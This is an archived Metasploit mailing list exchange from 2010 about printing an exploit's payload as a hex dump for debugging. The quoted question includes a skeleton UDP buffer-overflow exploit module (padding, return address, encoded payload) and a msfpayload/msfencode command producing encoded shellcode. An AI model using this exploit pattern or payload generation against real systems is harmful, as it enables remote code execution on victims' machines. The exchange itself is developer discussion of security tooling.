Metasploit mailing list archives
Re: printing payload for debug
From: egypt () metasploit com
Date: Wed, 2 Jun 2010 09:45:30 -0600
What you have should work, but if there are funny characters in the string they will be printed, too, possibly causing problems with your terminal. Try using: print_status(Rex::Text.to_hex_dump(crash)) or if you just want the hex bytes: print_status(Rex::Text.to_hex(crash)) If you really want output identical to msfencode, see the various methods like Rex::Text.to_ruby Hope this helped, egypt On Wed, Jun 2, 2010 at 7:19 AM, nahidul kibria <nahidupa () gmail com> wrote:
hi,
how can i print final exploit data as alpha numeric i mean x86/alpha_mixed
before final send data
def exploit
connect_udp
print_status("Building Crash")
crash = "\x00\x01"
crash += "\x41" * 256
crash += [target.ret].pack('V')
crash += payload.encoded
crash += "\x00"
/////////try to print here..
print_status(crash)
udp_sock.put(crash)
disconnect_udp
end
or is there anyway to check final exploit output from ./msfconsole after
setting all other options. the way msfpayload do. (./msfpayload windows/cxec
cmd.exe R | ./msfencode -e x86/alpha_mixed)
thanks
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- printing payload for debug nahidul kibria (Jun 02)
- Re: printing payload for debug egypt (Jun 02)
